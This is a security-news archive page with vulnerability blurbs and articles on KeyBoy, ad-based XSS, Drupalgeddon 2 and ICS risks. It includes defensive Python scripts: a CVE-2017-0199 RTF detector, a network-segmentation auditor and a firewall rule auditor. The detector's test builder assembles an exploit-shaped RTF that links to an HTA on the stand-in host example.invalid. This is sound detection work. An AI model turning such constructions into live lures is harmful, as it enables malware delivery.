Category Archives: Vulnerabilities

EOSBet Got Hacked Again; Lost 65000 EOS To Hackers

A month ago we heard of an attack on the EOSBet gambling app. That time, the hackers exploited a vulnerability

EOSBet Got Hacked Again; Lost 65000 EOS To Hackers on Latest Hacking News.

Beers with Talos EP 39: VB 2018 Rundown and Prevalent Problems with PDF



Beers with Talos (BWT) Podcast Ep. #39 is now available.

Ep. #39 show notes: 

Recorded Oct. 5, 2018 - We start out with a quick chat to get to know this week’s special guests from the Talos Outreach team: Paul Rascagneres, Vanja Svajcer and Warren Mercer. We discuss everyone’s work that was presented at Virus Bulletin, as well as Paul and Warren being nominated for the Péter Szőr Award. We also cover a lot of vulnerability discovery work that we recently released around various PDF software.

The timeline:

01:25 - Roundtable - Intros with our special guests Warren Mercer, Vanja Svajcer and Paul Rascagneres.
07:01 - Virus Bulletin and Korea in the Crosshairs nominated for Péter Szőr Award
22:42 - Other Talos talks and internet-of-things nonsense
28:39 - PDF vulnerabilities and how vulnerabilities can come in batches
35:23 - Closing thoughts and parting shots

The links

Péter Szőr Award: https://www.virusbulletin.com/conference/peter-szor-award/
Talos PDF vulnerability posts: https://blog.talosintelligence.com/search?q=pdf&by-date=true

==========

Featuring: Nigel Houghton (@EnglishLFC). Special guests: Warren Mercer (@SecurityBeard), Paul Rascagneres (@R00tBSD), and Vanja Svajcer (@VanjaSvajcer). Hosted by Mitch Neff (@MitchNeff).


Card Factory Exposed Customers Photos Publicly Due To A Website Flaw

Once again, a website glitch at a retailer has put the security and privacy of customers’ data at risk. This

Card Factory Exposed Customers Photos Publicly Due To A Website Flaw on Latest Hacking News.

VoiceOver iOS 12 Bug Creates Lock Screen Bypass Exposing User Photos

It hasn’t been long since we reported on other iOS 12 passcode bypass methods, however here we are with another one.

VoiceOver iOS 12 Bug Creates Lock Screen Bypass Exposing User Photos on Latest Hacking News.

Flaws in Branch.io Affected Over 685 Million Users

More than 685 million users have been affected by a security flaw in the Branch.io service which was used by

Flaws in Branch.io Affected Over 685 Million Users on Latest Hacking News.

KeyBoy Attacker Group Uses Publicly Available Exploit Code to Deliver Malware

The KeyBoy attacker group is using publicly available exploit code for two Microsoft security flaws to infect vulnerable machines with malware.

Researchers at AlienVault recently observed a new campaign launched by the KeyBoy attacker group, which has been active since at least 2013. In this latest operation, the group sent a phishing email to India’s ambassador to Ethiopia from an email address at nic.in, India’s National Informatics Centre.

The email arrived with an attachment that executed a script containing the public exploit code for CVE-2017-0199, a Microsoft vulnerability that allows attackers to execute arbitrary code using a crafted document. Other documents contained an exploit generator for CVE-2017-8570, which bypasses Microsoft’s patch for CVE-2017-0199.

Exploiting Known Vulnerabilities to Install TSSL and Titan Malware

Upon launching the exploit code, the script downloaded malware known as TSSL. Citizen Lab observed variants of TSSL that came with the FakeRun loader and the TClient backdoor, which allowed the attacker group to download additional threats and maintain a presence on an infected system.

AlienVault also detected KeyBoy’s ongoing distribution of Titan, Android malware that is capable of collecting an infected user’s data and performing instructions as a superuser, according to researchers at Lookout.

These KeyBoy attacks weren’t the first to involve exploit code for CVE-2017-0199 and CVE-2017-8570. FireEye observed attackers abusing CVE-2017-0199 with malicious Microsoft Office RTF documents in April 2017, and Trend Micro detected campaigns exploiting that same flaw via PowerPoint slideshows several months later. In April 2018, Zscaler identified a campaign that leveraged exploit code for CVE-2017-8570 to distribute LokiBot.
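The RTF variant of CVE-2017-0199 mentioned above has a recognisable shape on disk, which makes it a useful triage check. The scanner below is an added example for this archive, not code from the KeyBoy research or from AlienVault, FireEye or Trend Micro. It looks for the two things such a document needs: an OLE link object whose `\objdata` payload carries a URL moniker (the remote HTA to fetch) and an `\objupdate` control word that forces the link to refresh when the file opens. The sample documents it builds are constructed for the demonstration and are not malware.

```python
"""Heuristic scan of RTF files for a CVE-2017-0199-style auto-updating OLE2Link object.

Added example for this archive; it is not code from the KeyBoy research or from
AlienVault, FireEye or Trend Micro. RTF exploits for CVE-2017-0199 carry an \\object
whose hex-encoded \\objdata embeds a URL moniker pointing at the HTA to fetch, plus an
\\objupdate control word so Word refreshes the link (and runs the fetched handler) as the
document opens. The documents built by build_sample_rtf() are constructed here, not malware.
"""
import re

# CLSID of the URL moniker, {79EAC9E0-BAF9-11CE-8C82-00AA004BA90B}, as its little-endian
# bytes appear inside the hex-encoded \objdata stream.
URL_MONIKER_CLSID = bytes.fromhex("e0c9ea79f9bace118c8200aa004ba90b")

OBJDATA_RE = re.compile(rb"\\objdata\s*([0-9a-fA-F\s]+)")
# UTF-16LE "http://..." or "https://..." up to the first NUL character
UTF16_URL_RE = re.compile(rb"h\x00t\x00t\x00p\x00(?:s\x00)?:\x00(?:[\x21-\x7e]\x00)+")


def _objdata_blobs(data: bytes):
    """Yield the decoded binary payload of every \\objdata block in the RTF."""
    for m in OBJDATA_RE.finditer(data):
        hexstr = re.sub(rb"\s+", b"", m.group(1)).lower()
        hexstr = hexstr[: len(hexstr) - len(hexstr) % 2]  # drop a dangling nibble
        try:
            yield bytes.fromhex(hexstr.decode("ascii"))
        except ValueError:
            continue


def scan_rtf(data: bytes) -> dict:
    """Return what was found and a verdict: clean, suspicious, or likely CVE-2017-0199."""
    result = {
        "has_object": b"\\object" in data,
        "has_objupdate": b"\\objupdate" in data,
        "url_moniker": False,
        "urls": [],
        "verdict": "clean",
    }
    for blob in _objdata_blobs(data):
        if URL_MONIKER_CLSID in blob:
            result["url_moniker"] = True
            result["urls"] += [m.group(0).decode("utf-16-le") for m in UTF16_URL_RE.finditer(blob)]
    if result["url_moniker"] and result["has_objupdate"]:
        result["verdict"] = "likely CVE-2017-0199: auto-updating OLE link to a remote URL"
    elif result["url_moniker"]:
        result["verdict"] = "suspicious: embedded object links to a remote URL"
    return result


def build_sample_rtf(url: str, with_objupdate: bool) -> bytes:
    """Constructed test document: a minimal RTF wrapping an OLE link object to `url`."""
    payload = URL_MONIKER_CLSID + (url + "\x00").encode("utf-16-le")
    update = b"\\objupdate" if with_objupdate else b""
    return (b"{\\rtf1{\\object\\objautlink" + update + b"\\objw1\\objh1"
            + b"{\\*\\objdata " + payload.hex().encode("ascii") + b"}}}")


if __name__ == "__main__":
    samples = [
        ("exploit-like", build_sample_rtf("http://example.invalid/update.hta", True)),
        ("link-only", build_sample_rtf("http://example.invalid/doc.rtf", False)),
        ("plain", b"{\\rtf1 Quarterly report}"),
    ]
    for name, doc in samples:
        print(name, scan_rtf(doc))
```

Treat the verdict as a triage signal, not proof: real samples split control words, pad the hex with junk, nest the object differently or use `\objclass` variants, and the scanner above will miss some of them. For analysis of a live sample use a full RTF object parser such as rtfobj from oletools. Note also that CVE-2017-8570, the second bug the KeyBoy documents use, works through a different moniker and a scriptlet rather than a URL link, so this check does not cover it.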

The Key to Stopping KeyBoy Attacks

Organizations can protect themselves against KeyBoy’s campaigns and similar operations by practicing intelligent vulnerability management. This approach requires organizations to create an effective vulnerability assessment process and use it to evaluate flaws based on their level of risk. Instead of patching everything as quickly as possible, organizations can use these vulnerability assessments to determine the order in which bugs should be patched.

Sources: AlienVault, Citizen Lab, Lookout, FireEye, Trend Micro, Zscaler

The post KeyBoy Attacker Group Uses Publicly Available Exploit Code to Deliver Malware appeared first on Security Intelligence.

Podcast Episode 116: Cryptojacking and MikroTik’s Bad-Feeling Feel Good Patch Story

MikroTik is part of a bigger problem: the failure of infrastructure owners to take appropriate action to address serious security holes in products.

The post Podcast Episode 116: Cryptojacking and MikroTik’s Bad-Feeling Feel Good Patch Story appeared first on The Security Ledger.

Online ads: a potential way in for XSS attacks

Pretty much nobody likes to see adverts when they browse the Internet. But the fact is that we’ve come to accept them as a necessary evil. Interstitial and expanding ads are another matter: banners that jump from one place to another, covering up content, and which, without a shadow of a doubt, end up giving a bad user experience.

If only that were the only harm these ads could cause. At times, the banners we see most often day to day can end up becoming a real cybersecurity problem and a lure for cybercrime, especially in the business environment.

A draw for XSS attacks

The researcher Randy Westergren has found one of these security bugs. As he has been able to demonstrate, there is a kind of ad that is particularly vulnerable: those that rely on an iFrame Buster, a small helper page that a publisher hosts on its own domain so that an ad served from a third-party iframe can expand out of its frame, for example when the cursor is passed over it.

Westergren affirms that a significant (but unspecified) number of these busters allow an attacker to trigger an XSS attack: because the buster runs on the publisher’s own origin and takes parameters the attacker controls, the injected script can access the website in question’s cookies, the DOM (Document Object Model, the tree of elements the browser builds when it loads a page) and other session identifiers. If this happens while a company’s employee is browsing the Internet, the injected script could obtain information or a way into the company, all of which would put the whole organization’s corporate cybersecurity in serious danger.

A more widespread problem than it may seem

When we see this kind of threat, it’s always tempting to think that the attacks only happen on strange, fringe websites, or websites that no one in their right mind would trust. However, nothing could be further from the truth: Randy Westergren reports that vulnerable busters were found even among those used with DoubleClick, Google’s own ad service.

And the fact is, as the expert puts it, the problem doesn’t necessarily lie in the ads themselves, nor in the browsers. The issue starts with advertising agencies, which often choose to develop their own iFrame Busters; these are frequently written without proper validation of the input they accept, and that is what opens up these points of entry.

Thus, the danger isn’t confined to just sporadic, marginal websites, but rather it is also found on large sites, many of which can be visited by any employee in a company, even if they are on the website for strictly professional reasons. It is therefore not a case of an employee spending their time browsing websites for their own enjoyment and endangering their company’s cybersecurity; the danger can even get in when someone is working effectively.

So the cybercriminals that make use of these tactics will have it easier than ever, since they won’t even need to keep employees busy with suspicious websites or activities; they’ll be able to reel in these employees when they’re browsing normal websites.

How to avoid these attacks

XSS attacks can cause serious problems for corporate cybersecurity, which means that companies of all kinds must be on the lookout to keep cybercrime from knocking at their doors. They can do so in two ways:

1.- Raising awareness. We’ve said it on numerous occasions: most of the time, employees are the weakest link in the chain of cyberattacks, becoming the perfect victims because of their lack of knowledge about the risks they’re exposing themselves to. This is why it is so important that companies ensure at least a minimum of awareness about cybersecurity: making sure employees don’t trust suspicious websites, expanding banners, sites that request more permissions than expected and so on. In any case, anyone can be a potential victim, which means that employees must refer even the slightest suspicion to the cybersecurity team, so that an intrusion can be kept from spreading to the rest of the company.

2.- Cybersecurity solutions. Cybersecurity can never depend on employee awareness alone, so it’s vital that companies have cybersecurity services and solutions, such as Panda Adaptive Defense, that not only act in case of an incident, but also work preventively, analyzing possible risks and constantly updating security protocols in the face of new threats. In the case of vulnerabilities in third-party applications, as would be the case here, it’s also vital to have a solution that automatically manages updates and necessary patches, such as Panda Patch Management.

Problems with corporate cybersecurity don’t necessarily have to get in using organized cyberattacks, nor with attachments in emails: they can happen even when browsing normally, so companies must stay vigilant to keep cybercrime from getting into their company.

The post Online ads: a potential way in for XSS attacks appeared first on Panda Security Mediacenter.

Windows 10 October 2018 Update: Release – Halt – Bug Identified – Fix!

Windows 10 October 2018 Update came out as a patch bundle supposedly for facilitating users. However, right after the patch

Windows 10 October 2018 Update: Release – Halt – Bug Identified – Fix! on Latest Hacking News.

Is Your Site Protected Against Drupal Security Flaws?

Drupal is a leading open source content management system that powers a significant share of the most popular websites on the internet. If you have not heard about the Drupal security flaws from earlier this year, then you need to take a closer look at what happened and start taking precautions to protect your own installations.

A Brief History of Drupal Security Flaws

The first vulnerability was detected in March, according to Drupal, and had the most widespread implications, since everyone running Drupal from version 6 onward could be at risk — potentially affecting a million users. The oldest of these versions is no longer officially supported, yet it is still popular and can be found in production use.

Researchers have also found active automated exploit attempts in the wild, including campaigns that abuse the vulnerability known as Drupalgeddon 2 to place crypto-mining software on unpatched Drupal sites. This means threat actors are scanning IP address ranges to look for vulnerable websites.

The original Drupalgeddon, an SQL-injection vulnerability, was found back in 2014, according to Linux Journal. Drupalgeddon 2 is somewhat similar to its predecessor in that it is another injection flaw in the handling of form input: Drupal accepted attacker-supplied, “#”-prefixed render keys in request parameters without checking them, so a request can name a PHP function to be run as a callback, Check Point Research reported. As a result, anyone can send a specific request to a Drupal-powered website and take it over. No authentication is required, and once you are in, you have complete control over the site.

Drupal released patches for Drupalgeddon 2 in March 2018 as Drupal 7.58 and 8.5.1, with backports for the 8.3.x and 8.4.x branches. No attacks were known at the time of release; the automated exploitation described above began within weeks of the advisory.

How to Protect Your Website

Drupal compiled some recommendations for responding to a site breach that are worth reviewing not just for those tips specific to their software, but for the general implications of keeping your site current and secure.

For example, you should make a forensic copy of your site before applying any changes in case a threat actor has already entered your site. You should also decide whether to roll back or rebuild your servers and determine whom you should notify in case of a breach.

It’s important to note that just patching your server won’t be sufficient in the face of an exploit such as Drupalgeddon. An attacker could have already entered your system and taken complete control over your website. Examining user behavior can also help to identify improper access to site controls.

Drupal’s general suggestions are useful for any website, no matter what code it is running. These include:

  • Using multifactor authentication (MFA) to protect your logins. This should be common practice by now, but it bears repeating.
  • Using stronger admin passwords. This should also go without saying, but many users are still not employing secure password management.
  • Regularly auditing all your user accounts and ensuring that unfamiliar accounts or admin roles haven’t been created by a threat actor.
  • Not using an account named “admin” as your administrator’s account. This creates an obvious target.

What Drupal Is Doing to Bolster Security

Drupal has two security projects worth examining. The first is a module called Paranoia that blocks the places where PHP can be evaluated through the site’s web interface (the PHP input format, PHP in views and the like), which stops a compromised content or administrator account from escalating to code execution. The second is an older project called Security Review that checks your site’s configuration for common, easy-to-make security mistakes.

Cybersecurity is an ongoing, iterative process, so conducting code reviews and backing up data should be parts of a continuous audit of your website security. Above all else, security should be a central and ubiquitous pillar of your team’s general operations structure.

The post Is Your Site Protected Against Drupal Security Flaws? appeared first on Security Intelligence.

Sony Patched Three Critical Vulnerabilities In Smart TV Bravia

Smart TVs – despite being convenient and user-friendly they remain vulnerable to security threats. The hackers remain on the verge

Sony Patched Three Critical Vulnerabilities In Smart TV Bravia on Latest Hacking News.

Multiple Vulnerabilities Discovered In RouterOS That Affected MikroTik Routers

Once again, MikroTik Routers make it into the news. Allegedly, a researcher discovered several vulnerabilities in MikroTik Routers that could

Multiple Vulnerabilities Discovered In RouterOS That Affected MikroTik Routers on Latest Hacking News.

ICS Tactical Security Trends: Analysis of the Most Frequent Security Risks Observed in the Field

Introduction

FireEye iSIGHT Intelligence compiled extensive data from dozens of ICS security health assessment engagements (ICS Healthcheck) performed by Mandiant, FireEye's consulting team, to identify the most pervasive and highest priority security risks in industrial facilities. The information was acquired from hands-on assessments carried out over the last few years across a broad range of industries, including manufacturing, mining, automotive, energy, chemical, natural gas, and utilities. In this post, we provide details of these risks, and indicate best practices and recommendations to mitigate the identified risks.

Mandiant ICS Healthchecks

Mandiant ICS Healthchecks and penetration testing engagements include on-site assessments of customers' IT and ICS systems. The ICS Healthcheck consists of workshops and technical reviews. It captures the results in a final report that ranks discovered findings and vulnerabilities by risk using Mandiant’s Risk Rating method. During an onsite workshop with site technical experts, Mandiant develops a technical understanding of the subject control system(s), builds a network diagram of the control system, analyzes for potential vulnerabilities and threats, and assists with prioritizing recommended countermeasures to defend the environment.

Mandiant also collects and reviews packet captures of network traffic from the ICS environment to validate the network diagram constructed in the workshop and to identify any unexpected or undesirable deviations from the intended design. This traffic is also analyzed for evidence of compromise or misconfiguration of the ICS network/system. Mandiant inspects the deployed security technology for vulnerabilities and other architectural risks, such as inappropriately configured firewalls, dual-homed control system devices, and unnecessary connectivity to the business network or the Internet.

NOTE: Findings are discussed at a generalized level to preserve the anonymity of our customers. This post presents a high-level overview and is meant to be an informative first stop for customers interested in common cyber security issues. For more information or to request Mandiant services, please visit our website.

Methodology: Mandiant Risk Rating System

This blog post leverages information from Mandiant ICS Healthchecks, which evaluate cyber security risk in organizations from multiple industries. The rating of critical and high security risk is based on the Mandiant Risk Rating System, which is determined by identifying the exploitability and the impact of a given issue, and cross-referencing the results (Figure 1).


Figure 1: Impact/exploitability graphic

One Third of Security Risks in ICS Environments Ranked High or Critical

We reviewed findings from all of our risk assessments and then categorized and ranked the reported risks as critical or high, medium, low, or informational (Figure 2). At least 33 percent of the security issues we found in ICS organizations were rated high or critical risk, meaning they were most likely to allow adversaries to readily gain control of target systems and potentially compromise other systems or networks, cause disruption of services, disclose unauthorized information, or result in other significant negative consequences. We suggest immediate remediation for critical risks, and quick action to remediate high security risks.


Figure 2: Risk assessment distribution

Most Common High and Critical Security Risks in ICS Environments

FireEye iSIGHT Intelligence organized the critical and high security risks identified during Mandiant ICS Healthchecks into nine unique categories (Table 1). The three most common were:

  • Vulnerabilities, Patches, and Updates (32 percent)
  • Identity and Access Management (25 percent)
  • Architecture and Network Segmentation (11 percent)

In most of these cases, basic security best practices would be enough to stop threat actors from targeting an organization's systems, or at least make it considerably more difficult. The implications are vast, because specialized malware or actors targeting infrastructure would likely look for exactly these flaws first and exploit them throughout the targeted attack lifecycle.


Table 1: Distribution of high and critical security risks in ICS environments

Top Three High and Critical Risks and Recommended Mitigations

Vulnerabilities, Patches, and Updates

Vulnerability, patch, and update management procedures enable organizations to secure off-the-shelf software, hardware, and firmware from known security threats. Known vulnerabilities in ICS environments can be leveraged by threat actors to access the network and move laterally to execute targeted attacks. The following common risks were observed during our engagements:

  • Infrequent procedures for patching and updating control systems:
    • We encountered organizations with no formal vulnerability and patch management programs.
  • Out-of-date firmware, hardware, and operating systems (OS), including:
    • Network devices and systems such as switches, firewalls, and routers.
    • Hardware equipment, including desktop computers, cameras, and programmable logic controllers (PLCs).
    • Unsupported legacy operating systems such as Windows Server 2003, XP, 2000, and NT 4.
  • Unaddressed known vulnerabilities in software applications and equipment where patches are available:
    • We observed outdated firewalls with up to 53 unaddressed vulnerabilities and switches with more than 200 vulnerabilities.
    • System management software that can be exploited using known open source tools.
  • Lack of test environments to analyze patches and updates before implementation.

Mitigations

  • Develop a comprehensive ICS Vulnerability Management Strategy and include procedures to implement patches and updates on key assets. More information is provided by the National Institute of Standards and Technology's (NIST) Guide to ICS Security, NIST SP 800-82.
  • When patches and updates are no longer provided for key infrastructure, choose one of the two following options:
    • Implement a security perimeter around affected assets, protected by, at minimum, a firewall (industrial protocol inspection/blocking if appropriate) for access control and traffic filtering.
    • Decommission legacy devices that might be exploited to gain access to the network, such as switches.
  • Set up development systems or labs that are representative of the running IT and ICS devices. These systems can often be built from existing spares along with the purchase or loan of additional licenses for human-machine interfaces (HMIs) and configuration software from the system vendor. A development system is an excellent platform to test changes and patches, and on which to perform vulnerability scans without risk to active systems.

Identity and Access Management

The second most common category of security issues identified was related to the flaws in or absence of best practices for handling passwords and credentials. Common weaknesses identified by Mandiant include:

  • Lack of multi-factor authentication for remote access and critical accounts:
    • Users were able to remotely access ICS environments from the corporate network without requiring multi-factor authentication.
  • Lack of a comprehensive and enforced password policy:
    • Weak passwords with insufficient length or complexity used for privileged accounts, ICS user accounts, and service accounts.
    • Passwords were not changed frequently.
    • Passwords were reused for multiple accounts.
  • Prominently displayed passwords:
    • Passwords were written on the chassis of devices.
  • Hard-coded and default credentials in applications and equipment:
    • Mandiant discovered Remote Terminal Units (RTUs) containing default credentials, which are commonly available on the Internet and in the device manuals.
    • A modem contained a backdoor account incorporated by the manufacturer.
  • Commonly used “administrator” accounts.
  • Use of shared credentials.

Mitigations

  • Implement two-factor authentication for all possible users, especially administrative accounts.
  • Avoid keeping written copies of passwords and, if necessary, secure them out of sight with limited access for only authorized users.
  • Enforce password policies that require strong passwords that are regularly modified and cannot be reused. More information is available from SANS.
  • Avoid common, easily guessed user account names such as "operator," "administrator," or "admin." Instead, use uniquely named user accounts for all access.
  • Require administrative users to log in with uniquely named user accounts with strong passwords, tied back to an individual person.
  • Avoid shared accounts when feasible. However, if present, they should be hardened using strong passwords that are stored in an encrypted password manager.

Network Segregation and Segmentation

Of the top three risks identified in this post, weaknesses in network segregation and segmentation are the most important. Lack of segregation from the corporate IT network and within the ICS network allows threat actors opportunities to launch remote attacks against key infrastructure by moving laterally from IT services to ICS environments. Furthermore, it increases the risk of commodity malware spreading to ICS networks where the malware could interact with operational assets. The main risks identified by Mandiant included:

  • Plant systems accessible from the corporate network, either directly or through bridge devices (connected to both networks), such as unused servers, HMIs, historians, or loosely configured shared firewalls. We also found:
    • Unfiltered access to plant servers from corporate networks through, for example, a historian communicating with the distributed control system (DCS).
    • Missing segmentation between ICS and corporate networks.
    • Vulnerabilities in bridge devices (e.g., outdated appliances running vulnerable OS) that can enable lateral movement between networks.
    • Business functions (e.g., data backups and anti-virus updates) running on shared control system networks.
  • Dual-homed systems, both servers and desktop computers.
  • Industrial networks connected directly to the internet.

Mitigations

  • Segment all access to ICS with a network Demilitarized Zone (DMZ), as recommended by both NIST SP 800-82 and IEC (Figure 3):
    • Restrict the number of ports, services, and protocols used to establish communications between the ICS and corporate networks to the least possible to reduce the attack surface.
    • Terminate incoming access for both regular and administrative users first in the DMZ, and then establish another session with connectivity into the ICS network.
    • Place servers (or mirrored servers) that provide ICS data to the corporate network in the DMZ.
    • Use firewalls to filter all network traffic entering or leaving the ICS.
    • Firewall rules should filter both incoming traffic from the corporate network and outgoing traffic from the ICS, and they should only allow the minimum required amount of traffic to pass.
  • Isolate the control networks from the internet. A separate network should be used for internet access through a DMZ, and at no time should a bridged connection be allowed between the two networks.
  • Ensure that independent, regularly patched firewalls are used to separate the corporate network from the DMZ and ICS network, and review firewall rulesets on a regular basis.
  • Identify and redirect any non-control system traffic traversing the industrial network.
  • Eliminate all dual-homed servers and hosts.


Figure 3: Reference architecture for segmentation of enterprise and control system networks
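The segmentation review described in this section is, at bottom, a comparison of what the packet captures show against the zoned design in Figure 3. The script below is an added example for this post, not Mandiant's tooling or methodology: it assigns addresses to zones, flags flows that cross directly between corporate and ICS or between ICS and the internet, flags non-control protocols seen on the control network (the backup and anti-virus traffic mentioned above), and finds dual-homed hosts from an interface inventory. The zone subnets, the control-protocol port list, the host inventory and the flow records are all assumed for the demonstration.

```python
"""Check host interfaces and observed flows against a zoned reference architecture.

Added example for this post; it is not Mandiant's tooling or methodology. The zone
subnets, the host inventory, the control-protocol port list and the flow records are
assumed for the script. In practice the flows come from the packet captures reviewed
during a healthcheck (or from NetFlow), and the port list is tuned to the site's vendors.
"""
from ipaddress import ip_address, ip_network

# Assumed zones of the reference architecture: corporate <-> DMZ <-> ICS.
ZONES = {
    "corporate": [ip_network("10.10.0.0/16")],
    "dmz": [ip_network("10.15.0.0/24")],
    "ics": [ip_network("10.20.0.0/16")],
}
# Zone pairs that may talk directly; anything else must terminate in the DMZ.
ALLOWED_PAIRS = {("corporate", "dmz"), ("dmz", "corporate"), ("dmz", "ics"), ("ics", "dmz")}
# Control-system protocols expected on the ICS network (assumed site list).
CONTROL_PORTS = {
    ("tcp", 502): "Modbus/TCP", ("tcp", 20000): "DNP3", ("tcp", 102): "S7comm",
    ("tcp", 44818): "EtherNet/IP", ("udp", 2222): "EtherNet/IP I/O", ("tcp", 4840): "OPC UA",
}


def zone_of(ip: str) -> str:
    addr = ip_address(ip)
    for zone, nets in ZONES.items():
        if any(addr in net for net in nets):
            return zone
    return "internet" if addr.is_global else "unknown"


def check_flow(src: str, dst: str, proto: str, dport: int) -> list:
    """Issues raised by one observed flow; an empty list means it fits the architecture."""
    s, d = zone_of(src), zone_of(dst)
    issues = []
    if "ics" in (s, d) and "internet" in (s, d):
        issues.append(f"{s}->{d}: industrial network exposed to the internet")
    elif s != d and (s, d) not in ALLOWED_PAIRS:
        issues.append(f"{s}->{d}: direct path bypasses the DMZ")
    if "ics" in (s, d) and (proto, dport) not in CONTROL_PORTS:
        issues.append(f"non-control traffic on the ICS network ({proto}/{dport})")
    return issues


def dual_homed(hosts: dict) -> list:
    """Hosts with interfaces in more than one zone: the bridge devices the post warns about."""
    found = []
    for name, addrs in hosts.items():
        zones = sorted({zone_of(a) for a in addrs})
        if len(zones) > 1:
            found.append((name, zones))
    return found


def audit(flows: list, hosts: dict) -> list:
    """(subject, issue) pairs for every flow and host that deviates from the design."""
    findings = [(f"{s}->{d} {p}/{port}", issue)
                for s, d, p, port in flows for issue in check_flow(s, d, p, port)]
    findings += [(name, "dual-homed across " + "/".join(z)) for name, z in dual_homed(hosts)]
    return findings


# Constructed inventory and flow records (src, dst, proto, dst port).
SAMPLE_HOSTS = {
    "hist01": ["10.15.0.20"],                 # DMZ historian
    "eng-ws07": ["10.10.4.7", "10.20.4.7"],   # engineering workstation on both networks
    "plc-11": ["10.20.1.11"],
}
SAMPLE_FLOWS = [
    ("10.10.4.7", "10.20.1.11", "tcp", 502),   # corporate NIC straight to a PLC
    ("10.15.0.20", "10.20.1.11", "tcp", 502),  # DMZ historian polling the PLC: expected
    ("10.10.2.3", "10.15.0.20", "tcp", 443),   # corporate user reading the historian: expected
    ("10.20.3.5", "10.20.9.9", "tcp", 445),    # SMB backup job running on the control network
    ("10.20.3.5", "8.8.8.8", "udp", 53),       # ICS host resolving names on the internet
]

if __name__ == "__main__":
    for subject, issue in audit(SAMPLE_FLOWS, SAMPLE_HOSTS):
        print(f"{subject:32} {issue}")
```

The value of running this against real captures is less in the individual hits than in the remainder: every flow that is not explained by the design is either a rule to tighten, a device to remove from the bridge position, or a piece of business traffic (backups, AV updates, remote support) that belongs on a separate path through the DMZ.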

Additional Highlights

Additional common risks were identified from other categories, but with less frequency.

Network Management and Monitoring

We identified a lack of network security monitoring, intrusion detection, and intrusion prevention in organizations, including missing endpoint malware protection, unused ports left active, and limited visibility into ICS networks. We recommend the following best practices:

  • Define and implement a comprehensive network security monitoring strategy at the ICS level as part of an overarching ICS security program. Special attention should be placed on monitoring network segments where external connectivity occurs.
  • Implement or increase centralized system and network logging to provide visibility across the entire enterprise (IT and ICS). Monitor logs for anomalous behavior. Consider implementing additional host or network-based security controls that generate alerts or reject traffic based on anomalous or suspicious behavior.
  • Install a centrally managed anti-malware solution on all ICS and ICS DMZ hosts. Ensure that signature and application updates are deployed in a timely manner.
  • Explore alternatives for the deployment of an advanced endpoint protection solution that provides detection/prevention for malware and malicious activities that do not rely on signature-based detection methods.
  • Develop procedures to identify and shut down network ports when not in use.

Misconfigurations in Firewall Rules

We identified weak firewall rules including "ANY-ANY" configurations, conflicting or overlapping rules, overly permissive conditions allowing access to administrative services, and lack of console connection timeouts. We recommend the following best practices for secure firewall configuration:

  • Filtering rules should only allow access from/to specific source/destination IP addresses and ports.
  • Filter rules should specify a specific network protocol.
  • ICMP filter rules should specify a specific message type.
  • Filter rules should drop network packets instead of rejecting them.
  • Filter rules should perform a specific action and not rely on a default action.
  • Administrative session timeout parameters should be set to terminate those sessions after a predetermined amount of time.
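Each of the rules of thumb above can be checked mechanically once a ruleset is exported. The auditor below is an added example for this post, not Mandiant tooling: it flags ANY-ANY rules, rules without a protocol, ICMP rules without a message type, reject actions, administrative services reachable from broad source ranges, rules shadowed by (or in conflict with) an earlier rule, a ruleset that relies on the device's default action, and a missing administrative session timeout. The rule schema (one dict per rule, first match wins, "any" as wildcard) and the sample ruleset are assumed here and follow no vendor's syntax.

```python
"""Audit a firewall ruleset for the weaknesses listed above.

Added example for this post, not Mandiant tooling. The rule schema (one dict per rule,
evaluated first-match in list order, "any" as wildcard) and the sample ruleset are
assumed here and do not follow any vendor's syntax; map your own export onto it.
"""
from ipaddress import ip_network

# Services whose exposure from broad source ranges is flagged (assumed list).
ADMIN_PORTS = {22: "ssh", 23: "telnet", 3389: "rdp", 5900: "vnc"}
BROAD_PREFIX = 24   # a source wider than /24 (or "any") counts as broad


def _net(value):
    return None if value == "any" else ip_network(value, strict=False)


def _covers(outer: dict, inner: dict) -> bool:
    """True when every packet matching `inner` also matches `outer`."""
    for field in ("src", "dst"):
        o, i = _net(outer[field]), _net(inner[field])
        if o is not None and (i is None or not i.subnet_of(o)):
            return False
    for field in ("proto", "dport"):
        if outer[field] != "any" and outer[field] != inner[field]:
            return False
    return True


def audit(rules: list, device: dict) -> list:
    """Return findings as {"rule": id-or-None, "issue": code, "detail": text}."""
    findings = []

    def add(rule_id, issue, detail):
        findings.append({"rule": rule_id, "issue": issue, "detail": detail})

    for idx, r in enumerate(rules):
        if r["src"] == "any" and r["dst"] == "any" and r["proto"] == "any":
            add(r["id"], "any-any", "matches all traffic")
        if r["proto"] == "any":
            add(r["id"], "no-protocol", "rule does not name a protocol")
        if r["proto"] == "icmp" and not r.get("icmp_type"):
            add(r["id"], "icmp-no-type", "ICMP rule without a message type")
        if r["action"] == "reject":
            add(r["id"], "reject-not-drop", "use drop; a reject tells a scanner the rule exists")
        src = _net(r["src"])
        broad = src is None or src.prefixlen < BROAD_PREFIX
        if r["action"] == "accept" and broad and r["dport"] in ADMIN_PORTS:
            add(r["id"], "admin-service-broad-source",
                f"{ADMIN_PORTS[r['dport']]} reachable from {r['src']}")
        for earlier in rules[:idx]:
            if _covers(earlier, r):
                kind = "shadowed-by" if earlier["action"] == r["action"] else "conflicts-with"
                add(r["id"], f"{kind}-{earlier['id']}", "never reached: an earlier rule matches first")
                break
    last = rules[-1] if rules else None
    if not (last and last["action"] == "drop"
            and last["src"] == last["dst"] == last["proto"] == "any"):
        add(None, "no-explicit-default-deny", "ruleset relies on the device default action")
    if not device.get("admin_session_timeout"):
        add(None, "no-admin-timeout", "administrative sessions never expire")
    return findings


# Constructed ruleset and device settings for the demonstration.
SAMPLE_RULES = [
    {"id": 1, "src": "10.10.0.0/16", "dst": "10.20.5.10/32", "proto": "tcp", "dport": 502, "action": "accept"},
    {"id": 2, "src": "any", "dst": "10.20.0.0/16", "proto": "tcp", "dport": 3389, "action": "accept"},
    {"id": 3, "src": "any", "dst": "any", "proto": "any", "dport": "any", "action": "accept"},
    {"id": 4, "src": "10.10.1.0/24", "dst": "10.20.5.10/32", "proto": "tcp", "dport": 502, "action": "reject"},
    {"id": 5, "src": "any", "dst": "10.20.0.0/16", "proto": "icmp", "dport": "any", "action": "accept"},
]
SAMPLE_DEVICE = {"admin_session_timeout": 0}

if __name__ == "__main__":
    for f in audit(SAMPLE_RULES, SAMPLE_DEVICE):
        print(f"rule {f['rule']!s:>4}  {f['issue']:28} {f['detail']}")
```

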